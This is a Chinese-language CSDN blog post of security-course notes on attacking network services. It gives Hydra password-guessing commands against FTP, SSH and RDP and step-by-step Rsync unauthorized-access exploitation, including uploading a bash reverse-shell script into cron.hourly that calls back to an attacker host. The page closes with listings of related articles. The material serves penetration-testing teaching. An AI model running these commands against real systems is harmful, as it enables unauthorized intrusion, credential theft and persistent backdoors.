57、服务攻防——应用协议&Rsync&SSH&RDP&漏洞批扫&口令猜解

最新推荐文章于 2024-10-02 10:53:34 发布
最新推荐文章于 2024-10-02 10:53:34 发布
阅读量515 收藏 9
点赞数 8
分类专栏: 小迪安全 文章标签: ssh 运维
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_55202378/article/details/136757342
版权
文章讨论了Hydra工具针对FTP、RDP和SSH的口令猜解攻击,以及Rsync文件备份协议中的漏洞,展示了如何利用这些漏洞进行未授权访问,包括下载、上传文件和创建后门。此外,还提及了Proftpd在FTP服务器搭建中的角色和潜在风险。
摘要由CSDN通过智能技术生成

文章目录


在这里插入图片描述
在这里插入图片描述

口令猜解——Hydra-FTP&RDP&SSH

  • FTP:文本传输协议,端口21;
  • RDP:windows上远程终端协议,端口3389;
  • SSH:linux远程终端协议,端口22。
hydra -L test -P 10top1K.txt <ip地址> ftp -V
hydra -l root -P 10top1K.txt <ip地址> ssh -V
hydra -l administrator -P 10top1K.txt <ip地址> rdp -V

密码项目:fuzzDicts

配置不当——未授权访问—Rsync文件备份

Rsync:linux文件同步的应用程序,常用于本地计算机和远程计算机之间文件同步,端口873

  1. 判断是否存在Rsync未授权访问:rsync rsync://<ip:port>/
    在这里插入图片描述

    出现上述信息,说明存在rsync未授权访问。

  2. 利用:
    • 读取文件:rsync rsync://<ip:port>/src/
    • 下载文件:rsync rsync://<ip:port>/src/passwd ./
    • 上传文件:rsync -av passwd rsync://<ip:port>/src/tmp/passwd
  3. 反弹shell(借助系统计划任务)
    • 获取信息:rsync rsync://<ip:port>/src/etc/crontab /root/cron.txt(下载到本地查看)
    • 本地创建后门文件
    touch shell //创建文件

//文件内容
/bin/bash -i >& /dev/tcp/<攻击机ip:port> 0>&1

chmod +x shell //修改文件权限
    • 上传文件:rsync -av shell rsync://<ip:port>/src/etc/cron.hourly(上传到可利用的计划任务中)

fofa爬虫:fofa_viewer
在这里插入图片描述

协议漏洞——应用软件-FTP&Proftpd搭建

Proftpd:用于架设ftp服务。

PT_silver
关注
专栏目录
服务攻防-应用协议&Rsync&SSH&RDP&FTP&漏洞批扫&口令猜解
m0_61506558的博客
12-15 457
这先理清思路,如果我们在进行渗透测试的过程中有开放21是端口,可以尝试通过Hydra进行爆破,还有一个思路就是就看它FTP是用什么平台搭建的,例如使用Proftpd搭建的话,就可以利用Proftpd获取权限。OpenSSH 7.7前存在一个用户名枚举漏洞,通过该漏洞,攻击者可以判断某个用户名是否存在于目标主机中,可以当做信息收集。是一个自动化的爆破工具,暴力破解弱密码,是一个支持众多协议的爆破工具,已经集成到 Kali Linux。在认证成功之前发送消息。小写,指定密码破解,少用,一般是采用密码字典。
红队攻防渗透技术实战流程:红队目标信息收集之基础资产信息收集
HACKONE的博客
03-23 1093
在红队渗透测试中,客户的合作至关重要,他们会提供目标资产的基本信息作为初始攻击面。红队的行动范围通常是由客户明确授权界定的,这其中包括但不限于对主域名、下属子公司以及整个供应链体系中的相关资产进行安全测试。红队需严格按照约定的边界执行任务,可能涵盖但不限于对主域名下的各个子域名进行深度侦查,探究子公司间的网络互联情况,以及深入分析供应链各环节的软硬件设施、业务流程和数据交换点,以全方位评估和模拟真实攻击场景下的安全风险。在执行过程中,红队始终保持专业操守,确保所有行动均在合法、合规的前提下进行,并以增强客户
57天:服务攻防-应用协议&Rsync&SSH&RDP&FTP&漏洞批扫&口令猜解
weixin_71529930的博客
04-11 917
会生成excel表,选中ip哪一行进行复制,这里没有账号,也不会写python脚本,先直接手写一页把哈哈,这里是用fofa搜的韩国的一些873端口的ip地址。使用时需要高级会员或者普通会员的 API key,使用注册用户的 API key 会提示账户需要充值 F 币。这里由于该靶场为在线靶场,有时间限制,且必须利用公网ip反弹shell,这里利用下面的网址,搭建在线靶场:。利用ftp自动化部署工具,部署一个ftp,利用hydra进行爆破。ssh还有别的漏洞,但是有的过于旧,有的利用太过于苛刻。
57天-服务攻防-应用协议&Rsync&SSH&RDP&FTP&漏洞批扫&口令猜解
weixin_52529261的博客
01-29 794
服务攻防-应用协议&Rsync&SSH&RDP&FTP&漏洞批扫&口令猜解
服务攻防-协议漏洞-FTP&RDP&SSH&Rsync&ProFTPD&libssh&Openssh-Hydra工具使用&口令猜解&未授权访问
ran的博客
05-09 2478
▶工具下载地址▶工具简介Hydra是一种强大的网络登录破解工具,它可以尝试多种用户名和密码组合来尝试登录网络服务,例如SSHFTP、Telnet、SMTP、POP3等等。Hydra支持多线程并发登录尝试,并能自动处理输入和输出,使其成为自动化扫描和攻击测试的理想工具。此外,Hydra还支持使用代理服务器、设置超时时间、支持多种协议等高级功能。Hydra通常被用于渗透测试和网络安全评估,以检测目标系统中可能存在的弱点和安全漏洞
网络安全全栈培训笔记(57-服务攻防-应用协议&Rsync&SSH&RDP&FTP&漏洞批量扫描&口令拆解)
qq_46343633的博客
01-22 1177
1、服务攻防-远程控制&文件传输等2、远程控制-RDP&RDP&弱口令&漏洞3、文件传输-FTP&Rsyc&弱口令&漏洞
小迪安全 第57服务攻防-应用协议&Rsync&SSH&RDP&FTP&漏洞批扫&口令猜解
Morrowindzzw的博客
12-16 1162
hydra 是一个自动化的爆破工具,暴力破解弱密码, 是一个支持众多协议的爆破工具,已经集成到 KaliLinux 中,直接在终端打开即可 -s PORT 可通过这个参数指定非默认端口。这个漏洞条件需要知道一个非root用户的账号密码,这个账号不能用ssh链接,可以借助这个漏洞反弹shell,但反弹的又不是root用户,迪总说这个漏洞没啥用,俺也觉得没用,可以看下面这个链接。-p PASS 小写,指定密码破解,少用,一般是采用密码字典。如果提示红框里的东西,那就是有,如果没提示,那就没有。
WEB安全攻防渗透——第一章 渗透测试之信息收集
让我们跟随时代步伐,时刻学习时刻记录!
04-26 1615
一、信息收集 1.域名信息收集 1.1 Whois查询 #进入 /etc/ssh #输入命令 whois baidu.com #在线查询 #爱站工具网 https://whois.aizhan.com #站长之家 https://whois.chinaz.com #VirusTotal https://www.virustotal.com 1.2 备案信息查询 ICP备案查询网 http://www.beianbeian.com 天眼查 http://w
Web安全攻防:渗透测试实战指南
qq_67685234的博客
03-10 8733
第一章 渗透测试之信息收集 1.1 收集域名信息 ①得知目标域名 ②获取域名注册信息(域名DNS服务器信息和注册人联系信息) 1.1.1 Whois查询 标准互联网协议,收集网络注册信息,注册域名,IP地址等 Kali下的Whois查询 常用网站:爱站工具网(https://whois.aizhan.com) 站长之家(http://whois.chinaz.com) ...
网络攻防之渗透测试信息收集
hintll的博客
08-08 1788
网络攻防渗透信息收集 在网络攻防中渗透测试之前一般都要进行信息收集 直接上笔记:
Django Nginx+uwsgi 安装配置
lly202406的博客
10-02 263
本文将详细介绍如何在Linux环境下安装和配置Django应用程序,使用Nginx作为Web服务器和uwsgi作为应用程序服务器。
(笔记)第三期书生·浦语大模型实战营(十一卷王场)--书生入门岛通关第2关Python 基础知识
最新发布
haidizym的博客
10-02 330
学员闯关手册:https://aicarrier.feishu.cn/wiki/ZcgkwqteZi9s4ZkYr0Gcayg1n1g?课程视频:https://www.bilibili.com/video/BV1mS421X7h4/课程文档:https://github.com/InternLM/Tutorial/tree/camp3/docs/L0/Python。
vulnhub-DC-2靶机的测试报告
ccc_9wy的博客
09-27 728
基于渗透测试流程详细渗透dc-2靶机;获取所有的5个flag;bp爆破用户名和密码;rbash逃逸;git的sudo提权;wordpress;cluster bomb模式;弱口令
MySQL - 运维
ltt159264的博客
09-29 289
记录了所有的增删改查语句以及DDL语句
【大数据】大数据运维方案浅析总结
wnm23的专栏
09-27 966
流行的大数据运维管理,包括Cloudera的CDH和CDP、Hortonworks的HDP、Apache的Ambari、国产开源平台Datasophon,以及自动化运维工具Ansible和SaltStack。
Docker
m0_73939789的博客
10-01 1173
Docker本身包含一个后台服务,我们可以利用Docker命令告诉Docker服务,帮助我们快速部署指定的应用。Docker服务部署应用时,首先要去搜索并下载应用对应的镜像,然后根据镜像创建并允许容器,应用就部署完成了。
Lab1:虚拟机kolla安装部署openstack,并创建实例
张嘉睿的博客
09-27 676
openstack S 版本 iso 链接:https://pan.baidu.com/s/1XJPm3OUUU716FzzBdc97nA。在 /etc/kolla 目录下会生成 admin-openrc.sh 文件,其中包含了登录所需要的用户名和密码信息。两个 host-only 的网络, 其中一个网络的地址段设置为 10.10.10.1/24。下载地址:http://download.cirros-cloud.net/下载内容:cirros-0.5.1-x86_64-disk.img。
Jenkins本地安装配置与远程访问管理本地服务详细流程
VLOKL的博客
09-26 1210
本文主要介绍如何在Linux CentOS 7中安装Jenkins并结合cpolar内网穿透工具实现远程访问管理本地部署的Jenkins服务.Jenkins是一个开源的持续集成(CI)和持续交付(CD)工具,用于自动化构建、测试和部署软件项目。它提供了一个易于使用的平台,用于构建、测试和交付软件的过程。
使用rsyncSSH在CentOS5上安全同步两台服务器文件
"本文主要介绍了如何使用CentOS5系统中的rsync工具,通过ssh协议来安全地同步两台服务器之间的文件。rsync是Linux/Unix系统中常用的文件和目录同步工具,结合ssh可以提供安全的远程传输。我们将讨论rsync的一些常用...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值